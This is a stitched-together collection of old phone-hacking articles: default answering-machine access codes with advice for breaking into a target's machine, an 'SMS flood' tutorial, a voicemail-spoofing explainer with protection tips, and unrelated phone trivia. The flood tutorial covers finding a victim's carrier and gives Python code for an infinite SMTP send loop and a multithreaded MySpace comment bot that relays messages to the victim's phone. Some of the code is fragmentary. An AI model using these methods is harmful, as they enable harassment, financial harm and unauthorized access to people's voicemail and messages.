#9 – stop/exit any function
*8 – room monitor
5) Vtech (VT2650/VT2468) – preset access code is 50 – enter access code during announcement
#4 – repeat message
#6 – skips message
#5 – stops
#9 – delete message
#7 – review announcement (after beep press 7 to record an announcement and use #5 to stop)
6) Vtech (HK5886) – preset access code is 48 – enter access code during announcement
#1,2,3 – play new or old messages
#4 – repeat message
#6 – skip message
#5 – stop
#9 – delete message
#7 – review announcement (after beep press 7 to record an announcement and use #5 to stop)
7) Olympia (OL2410) – preset access code is 0000 – enter access code during accouncement
1,2,3 – select and play messages
4 – repeat message
44 – ignore message
6 – play next message
7 – delete current message
8 – record memo
9 – record announce (5 to stop)
0 – toggle answer on/off
* – play help menu
Doro – preset access code is 321 – enter access code right after outgoing message has played (or during)
1 – repeat/skip to previous message
2 – play/pause message
3 – skip to next message
4 – play current outgoing message
5 – record new outgoing message
6 – stop
7 – erase current message
8 – switch off answering machine
9 – switch on answering machine/select outgoing message
0 – (after playback) erases all messages
# – end playback
## – end call
9) Virgin Pulse cordless phone – preset access code is 123 – enter access code during outgoing message
1 – review current message
2 – skip to next message
3 – erase the current message
4 – play all or new messages
7 – repeat voice menu
0 – turn on/off TAD
10) Panasonic – preset access code is 11 or 1111 – enter access code during outgoing message
4 – new message playback
5 – all message playback
1 – repeat
2 – skip
9 – stop
7 – record new announcement (use 9 to end recording)
There are also a few random vendors that don’t automatically preset an access code on the machine, forcing it’s user to set one up him/herself. This is a small step forward as far as security is concerned, but every vendor I saw that did this still used a mere 2-digit access code. To test and see if your target has this type of setup press # when the machine start, and then press 0. If the machine returns to the announcement then you know this is the kind of machine it is. Of course, in reality, this isn’t all that bad of a scheme since you have 100 different combinations available for the access code. However, most users simply set these access codes as 11, 22, 69, etc. So yeah, just try it out. If it disconnects you after so many tries, call back from another payphone (which you should be using in this case).
Section 3: The Conclusion
Again, it’s sad that the same failed access code schemes that were used 15 years ago are still used today. It’s just more proof that common sense just can’t keep up with the pace of technology. We can create devices that can store more data, run such data more efficiently, and have it held on smaller and smaller devices, but it seems we just can’t keep that data secure. No matter how many advisories are released, no matter how many security lectures are given, none of it matters, because in the end people prefer ease over security. So until this mentality changes the same crap that worked 15 years ago will work 15 years from now.
by James Penguin
The purpose of the following article is to take you through the process of carrying out a *controlled* SMS flood against a single target. I will cover how to identify your target’s service provider, and two separate methods of attack. If you are unfamiliar with the concept of SMS flooding, I would suggest you read, “Creating and Utilizing an SMS Flooder” by Halla which can be found here on InformationLeak.
[ A Brief Review ]
Before we begin, a brief explanation of how this works. Every cell phone that supports SMS has its own email address, the format of that address is:
1+(Area Code)+(Phone Number) @(Service Provider’s SMS Gateway)
So the address for the phone number (555) 867-5309 where T-Mobile is the service provider would be, email@example.com By sending an email to this address, the phone it is associated with will receive a text message. And therein lies the potential for abuse.
NOTE: If the message sent is larger than the maximum size of a text message (Typically 160 characters) the message will be received as a picture message instead.
NOTE2: Depending on the service provider of your target, prefixing the address with a 1 may not work. Some providers, such as T-Mobile use it; and some providers, such as Verizon do not.
[ Identifying the Service Provider ]
The obvious first step in an SMS flood is identifying your target’s service provider. There are 2 methods of doing this, the first of which is just good ol’ fashioned social engineering. If you know your target personally, sending them a message along the lines of, “Agh my cell bill is ridiculous I hate who do you use?” will usually yield the desired info. However there are a few flaws with that strategy. First off it relies heavily on chance, it could give you away later on as the attacker, and finally it just isn’t stealthy. Luckily for us the White Pages’ reverse phone number lookup system lists not only the type of line for the number you search, but also the provider. So head on over to http://www.whitepages.com/reverse_phone plug in your target’s phone number, and whammo you now know their service provider. But just knowing your target’s service provider isn’t enough, you’ll also need to identify the SMS gateway for their particular service provider. A big list of service providers and their associated SMS gateway can be found at, http://net127.com/notes/index.php?title … teway_List … teway_List So for example, the SMS gateway for T-Mobile USA would be tmomail.net Which would mean that if your target’s phone number is (555) 867-5309, then their phone’s email address would be firstname.lastname@example.org And with that, you are now ready to begin your attack!
[ Method One: Direct Interface with a SMTP Server ]
Now the simplest method of course would be to telnet into a SMTP server and then send your messages. However telnetting in by hand and sending the messages one by one isn’t very efficient. That’s where a little Python magic comes into play, everything you’ll need to execute the flood can be done using the Python interpreter. So if you don’t already have it, go download and install Python from http://python.org and fire up the interpreter. Now use the following example as a guide for your own flood.
Python 2.4.3 (#1, Jul 26 2006, 20:13:39)
[GCC 3.4.6] on linux2
Type “help”, “copyright”, “credits” or “license” for more information.
>>> import smtplib
>>> smtp_server = “smtp.server.whatever”
>>> from_address = “email@example.com” # this can be whatever you like
>>> to_address = “firstname.lastname@example.org” # the target phone’s email address
>>> message = “:)” # Gonna send that girl a smiley face, girls love smiley faces
>>> s = smtplib.SMTP()
>>> while True: # creates an infinite loop
… print “Message sent!”
It’s that simple! Unfortunately, there are a couple problems with this method of attack. First of course is that you’ll only be able to get off about 50 messages before you’re banned from the server for spamming, and second is that you have to directly connect to the server and thus are being logged. While you could use a proxy, there’s an easier, and trickier method that requires no proxies and is just as effective.
[ Method Two: Forwarding Gmail With a MySpace Twist ]
First off, register an account with Gmail, and then create a MySpace account using your newly created Gmail account as the email address. Next go to the account settings for your new MySpace profile, and enable the following:
– Do not send me MySpace newsletters
– Under Privacy Settings:
– Friend Requests – Require email or last name
– Blog Comments – Friends Only
– And everything for the Group Invite and Event Invite privacy settings
– Under IM Privacy Settings:
– Select the radio button next to “No one can IM me.”
– And everything for Block IM Invites From settings
The goal of all these settings is to make it so that the only email you actually receive from MySpace are alerts for when you receive a profile comment. The next step is to use another MySpace account to become friends with the one you’ve just created.
Finally, setup your Gmail account to forward email it receives to your target phone’s email address. This is done by going to Settings > Forwarding and POP, and then selecting the radio button next to where it says “Forward a copy of incoming mail to” Obviously now you enter the target phone’s email address, and it doesn’t really matter whether or not you keep a copy in the Gmail inbox. Lastly click, “Save Changes” and you’re done.
With all these configurations complete you should now have a MySpace profile, that for every comment it receives will send a picture message (remember how I mentioned messages exceeding 160 characters are received as a picture message?) to your target’s phone. Thus creating a SMS flood is accomplished by spamming your newly created profile with comments. And wouldn’t you know it, I’ve already got a Python script to do just that! (Oh and it’s multi threaded to boot!)
import urllib2, ClientForm, threading, sys
email = “” # Email address of account to post comments
password = “” # Password of account to post comments
friendID = “” # Friend ID of recipient of comments
message = “” # Message to leave in comments
thread_limit = 40 # Number of bots to run in parallel
class postComment(threading.Thread): def __init__(self): threading.Thread.__init__(self) def run(self): print “Posting comment %d!” % counter
req = urllib2.Request(“http://comment.myspace.com/index.cfm?fuseaction=user.viewProfile_commentForm&friendID=%s” % friendID)
res = opener.open(req)
forms = ClientForm.ParseResponse(res)
form = forms
form[“ctl00$cpMain$postComment$commentTextBox”] = message
res = opener.open(form.click())
forms = ClientForm.ParseResponse(res)
form = forms
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
opener.addheaders = [(‘User-agent’, ‘Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)’)]
req = urllib2.Request(“http://login.myspace.com/index.cfm?fuseaction=login.process”)
res = opener.open(req)
forms = ClientForm.ParseResponse(res)
form = forms
form[“email”] = email
form[“password”] = password
# post comment
counter = 0
if threading.activeCount() < thread_limit:
sys.stdout.write(“\r%d Comments Posted.” % counter)
except KeyboardInterrupt: break
In order to run the script above, you’ll need to download the ClientForm module, found at http://www.clientform.com. Just extract ClientForm.py into the same directory as the script above. Now to to begin your attack, modify the necessary variables in commenter.py and then execute it.
[ Close ]
There you have it, two sure fire ways to piss off and rack up the phone bill of anyone you want. Just don’t go getting yourselves arrested. With that I bid you good day, and may the fortunes of war smile upon you.
How it Works
Voicemail hacking is a simple case of phone number spoofing, which is where you artificially make your number look like it’s the victims number. You then simply call the victims number while you’re spoofing the same number and you get sent directly to their voicemail. It’s works the same way as calling yourself from your phone, except you can do it from any phone. This method would be no good if every cell carrier required you to put in a password to access your voicemail, but they don’t. I’m pretty sure all cell carriers have the function but they probably have it turned off by default to prevent customers from forgetting their passwords and getting locked out of their voicemail.
I assume they think a call from the customer’s phone is security enough for most so they don’t turn it on by default. This is obviously not true since websites like telespoof are around and can even let you try it for free. All you have to do is put your number in the first box and the victims number in the second and third box and hit the “Try Telespoof” button. It will first call you and then the victim which should send you directly to their voicemail. If they don’t have a password then you’re in. So you see it’s more of trick than a hack since there’s not a lot between you and their voicemail. You didn’t really break into a house if the backdoor was open if you know what I mean!
Doing this is illegal, of course, and is probably considered to be wiretapping or something similar which I believe is a felony. So by all means don’t try this especially with malicious intent, because it can be traced if you’re not carful.
How to Protect Yourself
Protecting yourself is easy, all you have to do is put a password on your voicemail. To do this, or check to see if you have a password, just call yourself from your phone that is assigned to that number. If it doesn’t ask you for a password then you are at risk. To assign a password listen to the automated menu options. AT&T’s password settings are under Personal Option >> Administrative Options>> Passwords. Once there hitting 2 lets you turn the password on and off. Once you have done that and have navigated back to the passwords menu hitting one will let change the password.
The shortcut from the main menu is 4212 to turn passwords on and 4211 to change the password. Verizon has a password prompt on all their accounts so if you are a Verizon customer you are safe. I had to turn on my password on for my AT&T phone, so if you are a AT&T user you might want to check yours.
This whole scandal is really the cell carries fault making it easy for people to break into your voicemail account. If I were someone effected by these voicemail hacking scandals I would be suing them first.
200,000,000,000,000 (two hundred trillion) text messages are received in America every single day, which is more than an entire year’s worth of regular mail that’s received in America. 3339 is average number of texts sent by an American teen each month.
Here Is a list of & most unusual mobile phones in the world.
7) Soft Mobile Phone Concept by Roman Kriheli
Reminds me of a puffer fish more than anything else! It just bloats up!
6) Dial Phone by Jung Dae Hoon
Jewelry, retro , projector mish-mash!
5) Mobile Script Phone by Aleksandr Mukomelov
Like a script that opens up to unveil the secrets, the OLED screen unfurls and becomes your playground.
4) “_______” by Marc Schömann
This phone was probably heavily influenced by Dan Brown!
3) Soft Phone by Qian Jiang
Cotton Candy of a phone; It’s a series of discs with electronic fabric stretched in between! Unique in shape and materials.
2) Wearable Mobile Phone by Sunman Kwon
How many times have you used your fingers to dial a number, now how about using them for a keypad?
1) Moto Concept by Joseph Liang
This has to be the cutest looking phone EVER! A total DOLL!